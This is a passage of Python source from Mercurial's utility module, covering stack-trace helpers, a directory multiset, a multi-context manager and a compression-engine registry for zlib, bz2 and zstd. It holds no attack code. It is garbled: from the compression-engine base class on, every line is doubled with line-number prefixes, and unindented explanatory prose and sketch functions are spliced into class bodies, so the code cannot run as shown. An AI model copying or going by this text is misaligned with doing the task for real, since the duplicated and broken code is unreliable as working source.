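# Illustrative sketch (not part of the original module): hooks run in
# lexicographic order of their source names, not registration order:
#
#   h = hooks()
#   h.add('zzz', lambda x: x * 2)
#   h.add('aaa', lambda x: x + 1)
#   h(10)  -> [11, 20]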

def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code, but very convenient while developing.
    '''
    entries = [(fileline % (fn, ln), func)
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code, but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()

class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)
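
# Illustrative sketch (not part of the original module): finddirs() walks
# parent directories from deepest to shallowest, and dirs() exposes them as
# a membership set:
#
#   list(finddirs('a/b/c.txt'))  -> ['a/b', 'a']
#   d = dirs(['a/b/c.txt', 'a/d.txt'])
#   'a' in d, 'a/b' in d, 'a/b/c.txt' in d  -> (True, True, False)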

class ctxmanager(object):
    '''A context manager for use in 'with' blocks to allow multiple
    contexts to be entered at once. This is both safer and more
    flexible than contextlib.nested.

    Once Mercurial supports Python 2.7+, this will become mostly
    unnecessary.
    '''

    def __init__(self, *args):
        '''Accepts a list of no-argument functions that return context
        managers. These will be invoked at __call__ time.'''
        self._pending = args
        self._atexit = []

    def __enter__(self):
        return self

    def enter(self):
        '''Create and enter context managers in the order in which they were
        passed to the constructor.'''
        values = []
        for func in self._pending:
            obj = func()
            values.append(obj.__enter__())
            self._atexit.append(obj.__exit__)
        del self._pending
        return values

    def atexit(self, func, *args, **kwargs):
        '''Add a function to call when this context manager exits. The
        ordering of multiple atexit calls is unspecified, save that
        they will happen before any __exit__ functions.'''
        def wrapper(exc_type, exc_val, exc_tb):
            func(*args, **kwargs)
        self._atexit.append(wrapper)
        return func

    def __exit__(self, exc_type, exc_val, exc_tb):
        '''Context managers are exited in the reverse order from which
        they were created.'''
        received = exc_type is not None
        suppressed = False
        pending = None
        self._atexit.reverse()
        for exitfunc in self._atexit:
            try:
                if exitfunc(exc_type, exc_val, exc_tb):
                    suppressed = True
                    exc_type = None
                    exc_val = None
                    exc_tb = None
            except BaseException:
                pending = sys.exc_info()
                exc_type, exc_val, exc_tb = pending = sys.exc_info()
        del self._atexit
        if pending:
            raise exc_val
        return received and suppressed
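
# Illustrative sketch (not part of the original module): hypothetical file
# names, shown only to demonstrate the calling convention; managers are
# exited in reverse order even if the block raises:
#
#   with ctxmanager(lambda: open('a.txt'), lambda: open('b.txt')) as c:
#       fa, fb = c.enter()
#       # ... use fa and fb; b.txt is closed first, then a.txt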

# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()
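
# Illustrative sketch (not part of the original module): callers look up a
# registered engine by whichever identifier their context provides (the
# identifiers below are the ones the zlib engine registers further down):
#
#   compengines.forbundlename('gzip')   # user-facing bundle spec name
#   compengines.forbundletype('GZ')     # internal bundle identifier
#   compengines.forrevlogheader('x')    # revlog chunk header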
3301 class compressionengine(object):
3302 class compressionengine(object):
3302 """Base class for compression engines.
3303 """Base class for compression engines.
3303
3304
3304 Compression engines must implement the interface defined by this class.
3305 Compression engines must implement the interface defined by this class.
3305 """
3306 """
3306 def name(self):
3307 def name(self):
3307 """Returns the name of the compression engine.
3308 """Returns the name of the compression engine.
3308
3309
3309 This is the key the engine is registered under.
3310 This is the key the engine is registered under.
3310
3311
3311 This method must be implemented.
3312 This method must be implemented.
3312 """
3313 """
3313 raise NotImplementedError()
3314 raise NotImplementedError()
3314
3315
3315 def available(self):
3316 def available(self):
3316 """Whether the compression engine is available.
3317 """Whether the compression engine is available.
3317
3318
3318 The intent of this method is to allow optional compression engines
3319 The intent of this method is to allow optional compression engines
3319 that may not be available in all installations (such as engines relying
3320 that may not be available in all installations (such as engines relying
3320 on C extensions that may not be present).
3321 on C extensions that may not be present).
3321 """
3322 """
3322 return True
3323 return True
3323
3324
3324 def bundletype(self):
3325 def bundletype(self):
3325 """Describes bundle identifiers for this engine.
3326 """Describes bundle identifiers for this engine.
3326
3327
3327 If this compression engine isn't supported for bundles, returns None.
3328 If this compression engine isn't supported for bundles, returns None.
3328
3329
3329 If this engine can be used for bundles, returns a 2-tuple of strings of
3330 If this engine can be used for bundles, returns a 2-tuple of strings of
3330 the user-facing "bundle spec" compression name and an internal
3331 the user-facing "bundle spec" compression name and an internal
3331 identifier used to denote the compression format within bundles. To
3332 identifier used to denote the compression format within bundles. To
3332 exclude the name from external usage, set the first element to ``None``.
3333 exclude the name from external usage, set the first element to ``None``.
3333
3334
3334 If bundle compression is supported, the class must also implement
3335 If bundle compression is supported, the class must also implement
3335 ``compressstream`` and `decompressorreader``.
3336 ``compressstream`` and `decompressorreader``.
3336
3337
3337 The docstring of this method is used in the help system to tell users
3338 The docstring of this method is used in the help system to tell users
3338 about this engine.
3339 about this engine.
3339 """
3340 """
3340 return None
3341 return None
3341
3342
3342 def wireprotosupport(self):
3343 def wireprotosupport(self):
3343 """Declare support for this compression format on the wire protocol.
3344 """Declare support for this compression format on the wire protocol.
3344
3345
3345 If this compression engine isn't supported for compressing wire
3346 If this compression engine isn't supported for compressing wire
3346 protocol payloads, returns None.
3347 protocol payloads, returns None.
3347
3348
3348 Otherwise, returns ``compenginewireprotosupport`` with the following
3349 Otherwise, returns ``compenginewireprotosupport`` with the following
3349 fields:
3350 fields:
3350
3351
3351 * String format identifier
3352 * String format identifier
3352 * Integer priority for the server
3353 * Integer priority for the server
3353 * Integer priority for the client
3354 * Integer priority for the client
3354
3355
3355 The integer priorities are used to order the advertisement of format
3356 The integer priorities are used to order the advertisement of format
3356 support by server and client. The highest integer is advertised
3357 support by server and client. The highest integer is advertised
3357 first. Integers with non-positive values aren't advertised.
3358 first. Integers with non-positive values aren't advertised.
3358
3359
3359 The priority values are somewhat arbitrary and only used for default
3360 The priority values are somewhat arbitrary and only used for default
3360 ordering. The relative order can be changed via config options.
3361 ordering. The relative order can be changed via config options.
3361
3362
3362 If wire protocol compression is supported, the class must also implement
3363 If wire protocol compression is supported, the class must also implement
3363 ``compressstream`` and ``decompressorreader``.
3364 ``compressstream`` and ``decompressorreader``.
3364 """
3365 """
3365 return None
3366 return None
3366
3367
3367 def revlogheader(self):
3368 def revlogheader(self):
3368 """Header added to revlog chunks that identifies this engine.
3369 """Header added to revlog chunks that identifies this engine.
3369
3370
3370 If this engine can be used to compress revlogs, this method should
3371 If this engine can be used to compress revlogs, this method should
3371 return the bytes used to identify chunks compressed with this engine.
3372 return the bytes used to identify chunks compressed with this engine.
3372 Else, the method should return ``None`` to indicate it does not
3373 Else, the method should return ``None`` to indicate it does not
3373 participate in revlog compression.
3374 participate in revlog compression.
3374 """
3375 """
3375 return None
3376 return None
3376
3377
3377 def compressstream(self, it, opts=None):
3378 def compressstream(self, it, opts=None):
3378 """Compress an iterator of chunks.
3379 """Compress an iterator of chunks.
3379
3380
3380 The method receives an iterator (ideally a generator) of chunks of
3381 The method receives an iterator (ideally a generator) of chunks of
3381 bytes to be compressed. It returns an iterator (ideally a generator)
3382 bytes to be compressed. It returns an iterator (ideally a generator)
3382 of bytes of chunks representing the compressed output.
3383 of bytes of chunks representing the compressed output.
3383
3384
3384 Optionally accepts an argument defining how to perform compression.
3385 Optionally accepts an argument defining how to perform compression.
3385 Each engine treats this argument differently.
3386 Each engine treats this argument differently.
3386 """
3387 """
3387 raise NotImplementedError()
3388 raise NotImplementedError()
3388
3389
3389 def decompressorreader(self, fh):
3390 def decompressorreader(self, fh):
3390 """Perform decompression on a file object.
3391 """Perform decompression on a file object.
3391
3392
3392 Argument is an object with a ``read(size)`` method that returns
3393 Argument is an object with a ``read(size)`` method that returns
3393 compressed data. Return value is an object with a ``read(size)`` that
3394 compressed data. Return value is an object with a ``read(size)`` that
3394 returns uncompressed data.
3395 returns uncompressed data.
3395 """
3396 """
3396 raise NotImplementedError()
3397 raise NotImplementedError()
3397
3398
3398 def revlogcompressor(self, opts=None):
3399 def revlogcompressor(self, opts=None):
3399 """Obtain an object that can be used to compress revlog entries.
3400 """Obtain an object that can be used to compress revlog entries.
3400
3401
3401 The object has a ``compress(data)`` method that compresses binary
3402 The object has a ``compress(data)`` method that compresses binary
3402 data. This method returns compressed binary data or ``None`` if
3403 data. This method returns compressed binary data or ``None`` if
3403 the data could not be compressed (too small, not compressible, etc).
3404 the data could not be compressed (too small, not compressible, etc).
3404 The returned data should have a header uniquely identifying this
3405 The returned data should have a header uniquely identifying this
3405 compression format so decompression can be routed to this engine.
3406 compression format so decompression can be routed to this engine.
3406 This header should be identified by the ``revlogheader()`` return
3407 This header should be identified by the ``revlogheader()`` return
3407 value.
3408 value.
3408
3409
3409 The object has a ``decompress(data)`` method that decompresses
3410 The object has a ``decompress(data)`` method that decompresses
3410 data. The method will only be called if ``data`` begins with
3411 data. The method will only be called if ``data`` begins with
3411 ``revlogheader()``. The method should return the raw, uncompressed
3412 ``revlogheader()``. The method should return the raw, uncompressed
3412 data or raise a ``RevlogError``.
3413 data or raise a ``RevlogError``.
3413
3414
3414 The object is reusable but is not thread safe.
3415 The object is reusable but is not thread safe.
3415 """
3416 """
3416 raise NotImplementedError()
3417 raise NotImplementedError()
3417
3418
3418 class _zlibengine(compressionengine):
3419 class _zlibengine(compressionengine):
3419 def name(self):
3420 def name(self):
3420 return 'zlib'
3421 return 'zlib'
3421
3422
3422 def bundletype(self):
3423 def bundletype(self):
3423 """zlib compression using the DEFLATE algorithm.
3424 """zlib compression using the DEFLATE algorithm.
3424
3425
3425 All Mercurial clients should support this format. The compression
3426 All Mercurial clients should support this format. The compression
3426 algorithm strikes a reasonable balance between compression ratio
3427 algorithm strikes a reasonable balance between compression ratio
3427 and size.
3428 and size.
3428 """
3429 """
3429 return 'gzip', 'GZ'
3430 return 'gzip', 'GZ'
3430
3431
3431 def wireprotosupport(self):
3432 def wireprotosupport(self):
3432 return compewireprotosupport('zlib', 20, 20)
3433 return compewireprotosupport('zlib', 20, 20)
3433
3434
3434 def revlogheader(self):
3435 def revlogheader(self):
3435 return 'x'
3436 return 'x'
3436
3437
3437 def compressstream(self, it, opts=None):
3438 def compressstream(self, it, opts=None):
3438 opts = opts or {}
3439 opts = opts or {}
3439
3440
3440 z = zlib.compressobj(opts.get('level', -1))
3441 z = zlib.compressobj(opts.get('level', -1))
3441 for chunk in it:
3442 for chunk in it:
3442 data = z.compress(chunk)
3443 data = z.compress(chunk)
3443 # Not all calls to compress emit data. It is cheaper to inspect
3444 # Not all calls to compress emit data. It is cheaper to inspect
3444 # here than to feed empty chunks through generator.
3445 # here than to feed empty chunks through generator.
3445 if data:
3446 if data:
3446 yield data
3447 yield data
3447
3448
3448 yield z.flush()
3449 yield z.flush()
3449
3450
3450 def decompressorreader(self, fh):
3451 def decompressorreader(self, fh):
3451 def gen():
3452 def gen():
3452 d = zlib.decompressobj()
3453 d = zlib.decompressobj()
3453 for chunk in filechunkiter(fh):
3454 for chunk in filechunkiter(fh):
3454 while chunk:
3455 while chunk:
3455 # Limit output size to limit memory.
3456 # Limit output size to limit memory.
3456 yield d.decompress(chunk, 2 ** 18)
3457 yield d.decompress(chunk, 2 ** 18)
3457 chunk = d.unconsumed_tail
3458 chunk = d.unconsumed_tail
3458
3459
3459 return chunkbuffer(gen())
3460 return chunkbuffer(gen())
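
The ``unconsumed_tail`` loop above, reduced to a minimal standalone
sketch: cap each ``decompress()`` call at 256 KiB of output and feed
back whatever input zlib has not yet consumed.

    import zlib

    def bounded_decompress(blob, maxout=2 ** 18):
        d = zlib.decompressobj()
        out = []
        chunk = blob
        while chunk:
            # Limit output per call; leftover input lands in
            # d.unconsumed_tail and is fed back on the next pass.
            out.append(d.decompress(chunk, maxout))
            chunk = d.unconsumed_tail
        return ''.join(out)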
3460
3461
3461 class zlibrevlogcompressor(object):
3462 class zlibrevlogcompressor(object):
3462 def compress(self, data):
3463 def compress(self, data):
3463 insize = len(data)
3464 insize = len(data)
3464 # Caller handles empty input case.
3465 # Caller handles empty input case.
3465 assert insize > 0
3466 assert insize > 0
3466
3467
3467 if insize < 44:
3468 if insize < 44:
3468 return None
3469 return None
3469
3470
3470 elif insize <= 1000000:
3471 elif insize <= 1000000:
3471 compressed = zlib.compress(data)
3472 compressed = zlib.compress(data)
3472 if len(compressed) < insize:
3473 if len(compressed) < insize:
3473 return compressed
3474 return compressed
3474 return None
3475 return None
3475
3476
3476 # zlib makes an internal copy of the input buffer, doubling
3477 # zlib makes an internal copy of the input buffer, doubling
3477 # memory usage for large inputs. So do streaming compression
3478 # memory usage for large inputs. So do streaming compression
3478 # on large inputs.
3479 # on large inputs.
3479 else:
3480 else:
3480 z = zlib.compressobj()
3481 z = zlib.compressobj()
3481 parts = []
3482 parts = []
3482 pos = 0
3483 pos = 0
3483 while pos < insize:
3484 while pos < insize:
3484 pos2 = pos + 2**20
3485 pos2 = pos + 2**20
3485 parts.append(z.compress(data[pos:pos2]))
3486 parts.append(z.compress(data[pos:pos2]))
3486 pos = pos2
3487 pos = pos2
3487 parts.append(z.flush())
3488 parts.append(z.flush())
3488
3489
3489 if sum(map(len, parts)) < insize:
3490 if sum(map(len, parts)) < insize:
3490 return ''.join(parts)
3491 return ''.join(parts)
3491 return None
3492 return None
3492
3493
3493 def decompress(self, data):
3494 def decompress(self, data):
3494 try:
3495 try:
3495 return zlib.decompress(data)
3496 return zlib.decompress(data)
3496 except zlib.error as e:
3497 except zlib.error as e:
3497 raise error.RevlogError(_('revlog decompress error: %s') %
3498 raise error.RevlogError(_('revlog decompress error: %s') %
3498 str(e))
3499 str(e))
3499
3500
3500 def revlogcompressor(self, opts=None):
3501 def revlogcompressor(self, opts=None):
3501 return self.zlibrevlogcompressor()
3502 return self.zlibrevlogcompressor()
3502
3503
3503 compengines.register(_zlibengine())
3504 compengines.register(_zlibengine())
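
The large-input branch above avoids zlib's internal input copy by
compressing in 1 MiB windows. The same pattern as a standalone sketch
(the window size is an arbitrary choice here):

    import zlib

    def stream_compress(data, window=2 ** 20):
        z = zlib.compressobj()
        parts = []
        for pos in xrange(0, len(data), window):
            # Feed a bounded slice so zlib never copies the whole input.
            parts.append(z.compress(data[pos:pos + window]))
        parts.append(z.flush())
        return ''.join(parts)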
3504
3505
3505 class _bz2engine(compressionengine):
3506 class _bz2engine(compressionengine):
3506 def name(self):
3507 def name(self):
3507 return 'bz2'
3508 return 'bz2'
3508
3509
3509 def bundletype(self):
3510 def bundletype(self):
3510 """An algorithm that produces smaller bundles than ``gzip``.
3511 """An algorithm that produces smaller bundles than ``gzip``.
3511
3512
3512 All Mercurial clients should support this format.
3513 All Mercurial clients should support this format.
3513
3514
3514 This engine will likely produce smaller bundles than ``gzip`` but
3515 This engine will likely produce smaller bundles than ``gzip`` but
3515 will be significantly slower, both during compression and
3516 will be significantly slower, both during compression and
3516 decompression.
3517 decompression.
3517
3518
3518 If available, the ``zstd`` engine can yield similar or better
3519 If available, the ``zstd`` engine can yield similar or better
3519 compression at much higher speeds.
3520 compression at much higher speeds.
3520 """
3521 """
3521 return 'bzip2', 'BZ'
3522 return 'bzip2', 'BZ'
3522
3523
3523 # We declare a protocol name but don't advertise by default because
3524 # We declare a protocol name but don't advertise by default because
3524 # it is slow.
3525 # it is slow.
3525 def wireprotosupport(self):
3526 def wireprotosupport(self):
3526 return compewireprotosupport('bzip2', 0, 0)
3527 return compewireprotosupport('bzip2', 0, 0)
3527
3528
3528 def compressstream(self, it, opts=None):
3529 def compressstream(self, it, opts=None):
3529 opts = opts or {}
3530 opts = opts or {}
3530 z = bz2.BZ2Compressor(opts.get('level', 9))
3531 z = bz2.BZ2Compressor(opts.get('level', 9))
3531 for chunk in it:
3532 for chunk in it:
3532 data = z.compress(chunk)
3533 data = z.compress(chunk)
3533 if data:
3534 if data:
3534 yield data
3535 yield data
3535
3536
3536 yield z.flush()
3537 yield z.flush()
3537
3538
3538 def decompressorreader(self, fh):
3539 def decompressorreader(self, fh):
3539 def gen():
3540 def gen():
3540 d = bz2.BZ2Decompressor()
3541 d = bz2.BZ2Decompressor()
3541 for chunk in filechunkiter(fh):
3542 for chunk in filechunkiter(fh):
3542 yield d.decompress(chunk)
3543 yield d.decompress(chunk)
3543
3544
3544 return chunkbuffer(gen())
3545 return chunkbuffer(gen())
3545
3546
3546 compengines.register(_bz2engine())
3547 compengines.register(_bz2engine())
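
A hedged helper sketch showing how the ``bundletype()`` names above can
be resolved back to an engine; ``enginefrombundlename`` is invented for
illustration and is not part of this module:

    def enginefrombundlename(name):
        for engname in compengines:
            engine = compengines[engname]
            bt = engine.bundletype()
            # Engines with no user-facing bundle name (bt[0] of None)
            # are internal-only and skipped.
            if bt and bt[0] == name:
                return engine
        raise KeyError(name)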
3547
3548
3548 class _truncatedbz2engine(compressionengine):
3549 class _truncatedbz2engine(compressionengine):
3549 def name(self):
3550 def name(self):
3550 return 'bz2truncated'
3551 return 'bz2truncated'
3551
3552
3552 def bundletype(self):
3553 def bundletype(self):
3553 return None, '_truncatedBZ'
3554 return None, '_truncatedBZ'
3554
3555
3555 # We don't implement compressstream because it is hackily handled elsewhere.
3556 # We don't implement compressstream because it is hackily handled elsewhere.
3556
3557
3557 def decompressorreader(self, fh):
3558 def decompressorreader(self, fh):
3558 def gen():
3559 def gen():
3559 # The input stream doesn't have the 'BZ' header. So add it back.
3560 # The input stream doesn't have the 'BZ' header. So add it back.
3560 d = bz2.BZ2Decompressor()
3561 d = bz2.BZ2Decompressor()
3561 d.decompress('BZ')
3562 d.decompress('BZ')
3562 for chunk in filechunkiter(fh):
3563 for chunk in filechunkiter(fh):
3563 yield d.decompress(chunk)
3564 yield d.decompress(chunk)
3564
3565
3565 return chunkbuffer(gen())
3566 return chunkbuffer(gen())
3566
3567
3567 compengines.register(_truncatedbz2engine())
3568 compengines.register(_truncatedbz2engine())
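
A minimal illustration of the header re-injection trick above: a stream
whose leading 'BZ' magic was consumed elsewhere can still be decoded by
priming a fresh decompressor with those two bytes.

    import bz2

    payload = bz2.compress('hello')
    d = bz2.BZ2Decompressor()
    d.decompress('BZ')                # re-inject the stripped magic
    print d.decompress(payload[2:])   # prints 'hello'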
3568
3569
3569 class _noopengine(compressionengine):
3570 class _noopengine(compressionengine):
3570 def name(self):
3571 def name(self):
3571 return 'none'
3572 return 'none'
3572
3573
3573 def bundletype(self):
3574 def bundletype(self):
3574 """No compression is performed.
3575 """No compression is performed.
3575
3576
3576 Use this compression engine to explicitly disable compression.
3577 Use this compression engine to explicitly disable compression.
3577 """
3578 """
3578 return 'none', 'UN'
3579 return 'none', 'UN'
3579
3580
3580 # Clients always support uncompressed payloads. Servers don't because,
3581 # Clients always support uncompressed payloads. Servers don't because,
3581 # unless you are on a fast network, uncompressed payloads can easily
3582 # unless you are on a fast network, uncompressed payloads can easily
3582 # saturate your network pipe.
3583 # saturate your network pipe.
3583 def wireprotosupport(self):
3584 def wireprotosupport(self):
3584 return compewireprotosupport('none', 0, 10)
3585 return compewireprotosupport('none', 0, 10)
3585
3586
3586 # We don't implement revlogheader because it is handled specially
3587 # We don't implement revlogheader because it is handled specially
3587 # in the revlog class.
3588 # in the revlog class.
3588
3589
3589 def compressstream(self, it, opts=None):
3590 def compressstream(self, it, opts=None):
3590 return it
3591 return it
3591
3592
3592 def decompressorreader(self, fh):
3593 def decompressorreader(self, fh):
3593 return fh
3594 return fh
3594
3595
3595 class nooprevlogcompressor(object):
3596 class nooprevlogcompressor(object):
3596 def compress(self, data):
3597 def compress(self, data):
3597 return None
3598 return None
3598
3599
3599 def revlogcompressor(self, opts=None):
3600 def revlogcompressor(self, opts=None):
3600 return self.nooprevlogcompressor()
3601 return self.nooprevlogcompressor()
3601
3602
3602 compengines.register(_noopengine())
3603 compengines.register(_noopengine())
3603
3604
3604 class _zstdengine(compressionengine):
3605 class _zstdengine(compressionengine):
3605 def name(self):
3606 def name(self):
3606 return 'zstd'
3607 return 'zstd'
3607
3608
3608 @propertycache
3609 @propertycache
3609 def _module(self):
3610 def _module(self):
3610 # Not all installs have the zstd module available. So defer importing
3611 # Not all installs have the zstd module available. So defer importing
3611 # until first access.
3612 # until first access.
3612 try:
3613 try:
3613 from . import zstd
3614 from . import zstd
3614 # Force delayed import.
3615 # Force delayed import.
3615 zstd.__version__
3616 zstd.__version__
3616 return zstd
3617 return zstd
3617 except ImportError:
3618 except ImportError:
3618 return None
3619 return None
3619
3620
3620 def available(self):
3621 def available(self):
3621 return bool(self._module)
3622 return bool(self._module)
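
The deferred-import pattern above, as a standalone sketch that reuses
this module's ``propertycache``; ``json`` stands in for an optional
dependency:

    class lazymodule(object):
        @propertycache
        def _module(self):
            # Pay the import cost (and absorb ImportError) on first
            # access only; propertycache memoizes the result.
            try:
                import json
                return json
            except ImportError:
                return None

        def available(self):
            return bool(self._module)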
3622
3623
3623 def bundletype(self):
3624 def bundletype(self):
3624 """A modern compression algorithm that is fast and highly flexible.
3625 """A modern compression algorithm that is fast and highly flexible.
3625
3626
3626 Only supported by Mercurial 4.1 and newer clients.
3627 Only supported by Mercurial 4.1 and newer clients.
3627
3628
3628 With the default settings, zstd compression is both faster and yields
3629 With the default settings, zstd compression is both faster and yields
3629 better compression than ``gzip``. It also frequently yields better
3630 better compression than ``gzip``. It also frequently yields better
3630 compression than ``bzip2`` while operating at much higher speeds.
3631 compression than ``bzip2`` while operating at much higher speeds.
3631
3632
3632 If this engine is available and backwards compatibility is not a
3633 If this engine is available and backwards compatibility is not a
3633 concern, it is likely the best available engine.
3634 concern, it is likely the best available engine.
3634 """
3635 """
3635 return 'zstd', 'ZS'
3636 return 'zstd', 'ZS'
3636
3637
3637 def wireprotosupport(self):
3638 def wireprotosupport(self):
3638 return compewireprotosupport('zstd', 50, 50)
3639 return compewireprotosupport('zstd', 50, 50)
3639
3640
3640 def revlogheader(self):
3641 def revlogheader(self):
3641 return '\x28'
3642 return '\x28'
3642
3643
3643 def compressstream(self, it, opts=None):
3644 def compressstream(self, it, opts=None):
3644 opts = opts or {}
3645 opts = opts or {}
3645 # zstd level 3 is almost always significantly faster than zlib
3646 # zstd level 3 is almost always significantly faster than zlib
3646 # while providing no worse compression. It strikes a good balance
3647 # while providing no worse compression. It strikes a good balance
3647 # between speed and compression.
3648 # between speed and compression.
3648 level = opts.get('level', 3)
3649 level = opts.get('level', 3)
3649
3650
3650 zstd = self._module
3651 zstd = self._module
3651 z = zstd.ZstdCompressor(level=level).compressobj()
3652 z = zstd.ZstdCompressor(level=level).compressobj()
3652 for chunk in it:
3653 for chunk in it:
3653 data = z.compress(chunk)
3654 data = z.compress(chunk)
3654 if data:
3655 if data:
3655 yield data
3656 yield data
3656
3657
3657 yield z.flush()
3658 yield z.flush()
3658
3659
3659 def decompressorreader(self, fh):
3660 def decompressorreader(self, fh):
3660 zstd = self._module
3661 zstd = self._module
3661 dctx = zstd.ZstdDecompressor()
3662 dctx = zstd.ZstdDecompressor()
3662 return chunkbuffer(dctx.read_from(fh))
3663 return chunkbuffer(dctx.read_from(fh))
3663
3664
3664 class zstdrevlogcompressor(object):
3665 class zstdrevlogcompressor(object):
3665 def __init__(self, zstd, level=3):
3666 def __init__(self, zstd, level=3):
3666 # Writing the content size adds a few bytes to the output. However,
3667 # Writing the content size adds a few bytes to the output. However,
3667 # it allows decompression to be more optimal since we can
3668 # it allows decompression to be more optimal since we can
3668 # pre-allocate a buffer to hold the result.
3669 # pre-allocate a buffer to hold the result.
3669 self._cctx = zstd.ZstdCompressor(level=level,
3670 self._cctx = zstd.ZstdCompressor(level=level,
3670 write_content_size=True)
3671 write_content_size=True)
3671 self._dctx = zstd.ZstdDecompressor()
3672 self._dctx = zstd.ZstdDecompressor()
3672 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3673 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3673 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3674 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3674
3675
3675 def compress(self, data):
3676 def compress(self, data):
3676 insize = len(data)
3677 insize = len(data)
3677 # Caller handles empty input case.
3678 # Caller handles empty input case.
3678 assert insize > 0
3679 assert insize > 0
3679
3680
3680 if insize < 50:
3681 if insize < 50:
3681 return None
3682 return None
3682
3683
3683 elif insize <= 1000000:
3684 elif insize <= 1000000:
3684 compressed = self._cctx.compress(data)
3685 compressed = self._cctx.compress(data)
3685 if len(compressed) < insize:
3686 if len(compressed) < insize:
3686 return compressed
3687 return compressed
3687 return None
3688 return None
3688 else:
3689 else:
